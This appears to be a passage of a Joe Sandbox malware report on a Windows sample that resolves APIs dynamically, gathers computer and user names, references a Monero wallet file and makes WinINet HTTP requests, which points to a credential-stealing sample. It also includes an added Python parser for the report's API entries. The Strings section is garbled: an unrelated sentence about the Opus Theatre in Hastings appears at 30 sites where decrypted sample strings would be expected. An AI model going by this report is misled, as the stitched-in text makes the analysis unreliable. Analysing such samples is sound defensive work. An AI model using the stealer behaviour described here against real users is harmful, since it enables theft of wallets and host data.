                  • GetProcAddress.KERNEL32(74DD0000,00C824B8), ref: 00FC99DE
                  • GetProcAddress.KERNEL32(74DD0000,00C82458), ref: 00FC99F6
                  • GetProcAddress.KERNEL32(74DD0000,00C75C90), ref: 00FC9A0E
                  • GetProcAddress.KERNEL32(74DD0000,00C82470), ref: 00FC9A27
                  • GetProcAddress.KERNEL32(74DD0000,00C82488), ref: 00FC9A3F
                  • GetProcAddress.KERNEL32(74DD0000,00C75AB0), ref: 00FC9A57
                  • GetProcAddress.KERNEL32(74DD0000,00C824A0), ref: 00FC9A70
                  • GetProcAddress.KERNEL32(74DD0000,00C75B10), ref: 00FC9A88
                  • LoadLibraryA.KERNEL32(00C82548,?,00FC6A00), ref: 00FC9A9A
                  • LoadLibraryA.KERNEL32(00C82590,?,00FC6A00), ref: 00FC9AAB
                  • LoadLibraryA.KERNEL32(00C82530,?,00FC6A00), ref: 00FC9ABD
                  • LoadLibraryA.KERNEL32(00C825D8,?,00FC6A00), ref: 00FC9ACF
                  • LoadLibraryA.KERNEL32(00C825A8,?,00FC6A00), ref: 00FC9AE0
                  • GetProcAddress.KERNEL32(75A70000,00C82518), ref: 00FC9B02
                  • GetProcAddress.KERNEL32(75290000,00C82560), ref: 00FC9B23
                  • GetProcAddress.KERNEL32(75290000,00C82578), ref: 00FC9B3B
                  • GetProcAddress.KERNEL32(75BD0000,00C825C0), ref: 00FC9B5D
                  • GetProcAddress.KERNEL32(75450000,00C75D50), ref: 00FC9B7E
                  • GetProcAddress.KERNEL32(76E90000,00C88F78), ref: 00FC9B9F
                  • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00FC9BB6
                  Strings
                  • NtQueryInformationProcess, xrefs: 00FC9BAA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: NtQueryInformationProcess
                  • API String ID: 2238633743-2781105232
                  • Opcode ID: fa69084b1ebd50339cf777fd99be4abb4d28758e3a8faff5862cc1d2f9b3d25c
                  • Instruction ID: b80a9100788e59a98e35383e9003f1d91a589ada4127d525645c6287aea7d499
                  • Opcode Fuzzy Hash: fa69084b1ebd50339cf777fd99be4abb4d28758e3a8faff5862cc1d2f9b3d25c
                  • Instruction Fuzzy Hash: D6A14CB55046019FD36CDBA9F598D5637F9FF88342B04863EA62E8320CD67EA8C1CB50

Control-flow Graph

Basic blocks (the Executed / Not Executed colouring of the rendered graph is not reproduced):
• 764: fb45c0-fb4695, RtlAllocateHeap -> 781
• 781: fb46a0-fb46a6 -> 782, 783
• 783: fb46ac-fb474a -> 781 (loop back)
• 782: fb474f-fb47a9, VirtualProtect
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FB460E
                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00FB479C
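As an added example (not part of the Joe Sandbox report and not code from the sample), the following Python parses the `APIs` entries printed above for fc9860 and fb45c0, groups the GetProcAddress calls by the module handle they are resolved against, counts how many are made before the first LoadLibraryA, pulls out the one literal name the report recovered (NtQueryInformationProcess), and decodes the flNewProtect value of the VirtualProtect call into its PAGE_* flags. The entries are embedded as a constructed sample copied from this page; the argument order assumed for VirtualProtect (lpAddress, dwSize, flNewProtect, lpOldProtect) is an assumption about how the report prints arguments.

```python
import re
from collections import Counter

# Constructed sample input: the "APIs" entries of the fc9860 and fb45c0 function
# blocks, copied from this report in the order the report lists them.
REPORT_APIS = """
• GetProcAddress.KERNEL32(74DD0000,00C82320), ref: 00FC98A1
• GetProcAddress.KERNEL32(74DD0000,00C823E0), ref: 00FC98BA
• GetProcAddress.KERNEL32(74DD0000,00C82440), ref: 00FC98D2
• GetProcAddress.KERNEL32(74DD0000,00C82218), ref: 00FC98EA
• GetProcAddress.KERNEL32(74DD0000,00C82350), ref: 00FC9903
• GetProcAddress.KERNEL32(74DD0000,00C88FD8), ref: 00FC991B
• GetProcAddress.KERNEL32(74DD0000,00C75DF0), ref: 00FC9933
• GetProcAddress.KERNEL32(74DD0000,00C75AF0), ref: 00FC994C
• GetProcAddress.KERNEL32(74DD0000,00C823B0), ref: 00FC9964
• GetProcAddress.KERNEL32(74DD0000,00C824E8), ref: 00FC997C
• GetProcAddress.KERNEL32(74DD0000,00C82500), ref: 00FC9995
• GetProcAddress.KERNEL32(74DD0000,00C823F8), ref: 00FC99AD
• GetProcAddress.KERNEL32(74DD0000,00C75AD0), ref: 00FC99C5
• GetProcAddress.KERNEL32(74DD0000,00C824B8), ref: 00FC99DE
• GetProcAddress.KERNEL32(74DD0000,00C82458), ref: 00FC99F6
• GetProcAddress.KERNEL32(74DD0000,00C75C90), ref: 00FC9A0E
• GetProcAddress.KERNEL32(74DD0000,00C82470), ref: 00FC9A27
• GetProcAddress.KERNEL32(74DD0000,00C82488), ref: 00FC9A3F
• GetProcAddress.KERNEL32(74DD0000,00C75AB0), ref: 00FC9A57
• GetProcAddress.KERNEL32(74DD0000,00C824A0), ref: 00FC9A70
• GetProcAddress.KERNEL32(74DD0000,00C75B10), ref: 00FC9A88
• LoadLibraryA.KERNEL32(00C82548,?,00FC6A00), ref: 00FC9A9A
• LoadLibraryA.KERNEL32(00C82590,?,00FC6A00), ref: 00FC9AAB
• LoadLibraryA.KERNEL32(00C82530,?,00FC6A00), ref: 00FC9ABD
• LoadLibraryA.KERNEL32(00C825D8,?,00FC6A00), ref: 00FC9ACF
• LoadLibraryA.KERNEL32(00C825A8,?,00FC6A00), ref: 00FC9AE0
• GetProcAddress.KERNEL32(75A70000,00C82518), ref: 00FC9B02
• GetProcAddress.KERNEL32(75290000,00C82560), ref: 00FC9B23
• GetProcAddress.KERNEL32(75290000,00C82578), ref: 00FC9B3B
• GetProcAddress.KERNEL32(75BD0000,00C825C0), ref: 00FC9B5D
• GetProcAddress.KERNEL32(75450000,00C75D50), ref: 00FC9B7E
• GetProcAddress.KERNEL32(76E90000,00C88F78), ref: 00FC9B9F
• GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00FC9BB6
• RtlAllocateHeap.NTDLL(00000000), ref: 00FB460E
• VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00FB479C
"""

ENTRY_RE = re.compile(r"•\s*(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]{8})")
HEX32_RE = re.compile(r"[0-9A-Fa-f]{8}")


def parse_api_entries(text):
    """One dict per '• Api.MODULE(args), ref: addr' line, in report order."""
    entries = []
    for m in ENTRY_RE.finditer(text):
        api, module, args, ref = m.groups()
        entries.append({"api": api, "module": module,
                        "args": [a.strip() for a in args.split(",")], "ref": ref})
    return entries


def resolution_profile(entries):
    """Summarise dynamic API resolution: which module handles receive GetProcAddress,
    how many happen before any LoadLibraryA, and which names the report recovered."""
    by_handle, literal_names = Counter(), []
    before_first_load, seen_loadlibrary = 0, False
    for e in entries:
        if e["api"].startswith("LoadLibrary"):
            seen_loadlibrary = True
        elif e["api"] == "GetProcAddress":
            handle, name = e["args"][0], e["args"][1]
            by_handle[handle] += 1
            if not seen_loadlibrary:
                before_first_load += 1
            # An 8-digit hex value is only a pointer to a name the sandbox did not
            # recover; anything else is the literal export name.
            if not HEX32_RE.fullmatch(name):
                literal_names.append(name)
    return {
        "loadlibrary_calls": sum(e["api"].startswith("LoadLibrary") for e in entries),
        "getprocaddress_by_handle": dict(by_handle),
        "getprocaddress_before_first_loadlibrary": before_first_load,
        "literal_names": literal_names,
    }


# Memory-protection constants from winnt.h: base protections first, then modifiers.
PAGE_FLAGS = [
    (0x01, "PAGE_NOACCESS"), (0x02, "PAGE_READONLY"), (0x04, "PAGE_READWRITE"),
    (0x08, "PAGE_WRITECOPY"), (0x10, "PAGE_EXECUTE"), (0x20, "PAGE_EXECUTE_READ"),
    (0x40, "PAGE_EXECUTE_READWRITE"), (0x80, "PAGE_EXECUTE_WRITECOPY"),
    (0x100, "PAGE_GUARD"), (0x200, "PAGE_NOCACHE"), (0x400, "PAGE_WRITECOMBINE"),
]


def decode_page_protect(value):
    return [name for bit, name in PAGE_FLAGS if value & bit]


def virtualprotect_calls(entries):
    """Decode flNewProtect of each VirtualProtect entry. Assumption: the report lists
    arguments in call order (lpAddress, dwSize, flNewProtect, lpOldProtect)."""
    out = []
    for e in entries:
        if e["api"] == "VirtualProtect" and len(e["args"]) >= 3:
            flags = decode_page_protect(int(e["args"][2], 16))
            out.append({"ref": e["ref"], "flags": flags,
                        "has_base_protection": any(bit < 0x100 for bit, n in PAGE_FLAGS if n in flags)})
    return out


if __name__ == "__main__":
    ents = parse_api_entries(REPORT_APIS)
    print(resolution_profile(ents))
    print(virtualprotect_calls(ents))
```

Run stand-alone, it shows that 21 of the 28 GetProcAddress calls target handle 74DD0000 before any LoadLibraryA has been made (so that handle was obtained some other way), that five libraries are then loaded and seven more exports resolved, only one of them (NtQueryInformationProcess, from 76E90000) with a name the sandbox could print, and that the VirtualProtect value 0x100 is PAGE_GUARD with no base protection bit. A guard page applied to a 4-byte range is worth checking by hand, since it is more often a deliberate exception trigger for anti-debugging or self-modifying code than an ordinary protection change.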
                  Strings
• The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs (30, same string at every site): 00FB45C7, 00FB45D2, 00FB45DD, 00FB45E8, 00FB45F3, 00FB4617, 00FB4622, 00FB462D, 00FB4638, 00FB4643, 00FB4657, 00FB4662, 00FB466D, 00FB4678, 00FB4683, 00FB46AC, 00FB46B7, 00FB46C2, 00FB46CD, 00FB46D8, 00FB4713, 00FB471E, 00FB4729, 00FB4734, 00FB473F, 00FB474F, 00FB475A, 00FB4765, 00FB4770, 00FB477B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeapProtectVirtual
                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                  • API String ID: 1542196881-2218711628
                  • Opcode ID: 11bad7e7109603dcc4ff2a08ad4b4894f5b717807090f019004e83eb3c068bc4
                  • Instruction ID: def7a39281dc99318b26bfa586b20d157c6b34c58e0b8748c85d27c9a6d0d800
                  • Opcode Fuzzy Hash: 11bad7e7109603dcc4ff2a08ad4b4894f5b717807090f019004e83eb3c068bc4
                  • Instruction Fuzzy Hash: 8E41F471FCB60C6EC624B7A4B87EEDD775B6F52F01B685282E80052780CEB1B5016D2B

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 801 fb4880-fb4942 call fca7a0 call fb47b0 call fca740 * 5 InternetOpenA StrCmpCA 816 fb494b-fb494f 801->816 817 fb4944 801->817 818 fb4ecb-fb4ef3 InternetCloseHandle call fcaad0 call fb9ac0 816->818 819 fb4955-fb4acd call fc8b60 call fca920 call fca8a0 call fca800 * 2 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca920 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca920 call fca8a0 call fca800 * 2 InternetConnectA 816->819 817->816 829 fb4f32-fb4fa2 call fc8990 * 2 call fca7a0 call fca800 * 8 818->829 830 fb4ef5-fb4f2d call fca820 call fca9b0 call fca8a0 call fca800 818->830 819->818 905 fb4ad3-fb4ad7 819->905 830->829 906 fb4ad9-fb4ae3 905->906 907 fb4ae5 905->907 908 fb4aef-fb4b22 HttpOpenRequestA 906->908 907->908 909 fb4b28-fb4e28 call fca9b0 call fca8a0 call fca800 call fca920 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca920 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca920 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca920 call fca8a0 call fca800 call fca740 call fca920 * 2 call fca8a0 call fca800 * 2 call fcaad0 lstrlen call fcaad0 * 2 lstrlen call fcaad0 HttpSendRequestA 908->909 910 fb4ebe-fb4ec5 InternetCloseHandle 908->910 1021 fb4e32-fb4e5c InternetReadFile 909->1021 910->818 1022 fb4e5e-fb4e65 1021->1022 1023 fb4e67-fb4eb9 InternetCloseHandle call fca800 1021->1023 1022->1023 1024 fb4e69-fb4ea7 call fca9b0 call fca8a0 call fca800 1022->1024 1023->910 1024->1021
                  APIs
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                    • Part of subcall function 00FB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FB4839
                    • Part of subcall function 00FB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FB4849
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FB4915
                  • StrCmpCA.SHLWAPI(?,00C8EAA8), ref: 00FB493A
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FB4ABA
                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00FD0DDB,00000000,?,?,00000000,?,",00000000,?,00C8EA48), ref: 00FB4DE8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00FB4E04
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00FB4E18
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FB4E49
                  • InternetCloseHandle.WININET(00000000), ref: 00FB4EAD
                  • InternetCloseHandle.WININET(00000000), ref: 00FB4EC5
                  • HttpOpenRequestA.WININET(00000000,00C8E988,?,00C8E368,00000000,00000000,00400100,00000000), ref: 00FB4B15
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                  • InternetCloseHandle.WININET(00000000), ref: 00FB4ECF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 460715078-2180234286
                  • Opcode ID: f5e6772ec4fc7a2796d0bd9b1e5894cb93b83282cf1f1caf070ed9e52df898e0
                  • Instruction ID: dfb2a0ccbbdf62885b74c7e1170082abc22beb138812785f59f82f3f22803364
                  • Opcode Fuzzy Hash: f5e6772ec4fc7a2796d0bd9b1e5894cb93b83282cf1f1caf070ed9e52df898e0
                  • Instruction Fuzzy Hash: A812E47291011DAADB18EB90DE93FEEB339AF14304F5041ADB10662491EF787E49DB62
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC7910
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC7917
                  • GetComputerNameA.KERNEL32(?,00000104), ref: 00FC792F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateComputerNameProcess
                  • String ID:
                  • API String ID: 1664310425-0
                  • Opcode ID: 204910939c12d502d0df0fc1bbbfc31b350e1a08adb8f1b32ca04bafa2213fbf
                  • Instruction ID: 13446c0e512c48c067a3abf7bb95c2dbcd8046fc60212a4a61287b2e28cfc113
                  • Opcode Fuzzy Hash: 204910939c12d502d0df0fc1bbbfc31b350e1a08adb8f1b32ca04bafa2213fbf
                  • Instruction Fuzzy Hash: 930162B1904205EFC714DF95D946FAEBBB8FB44B21F10422EE555A3680C77959408BA1
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FB11B7), ref: 00FC7880
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC7887
                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00FC789F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateNameProcessUser
                  • String ID:
                  • API String ID: 1296208442-0
                  • Opcode ID: a50fbea8f942e7dd736a9b85938afde8b33249938cc435cbc9517f30b3ca4f9d
                  • Instruction ID: 7e7c080114c452236dc700b67ad7df230b750478a740a67b3e8661db04a19792
                  • Opcode Fuzzy Hash: a50fbea8f942e7dd736a9b85938afde8b33249938cc435cbc9517f30b3ca4f9d
                  • Instruction Fuzzy Hash: D4F0A4B1904209AFC714DF84D946FAEBBB8FB04711F10022DF615A3680C77815448BA1
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
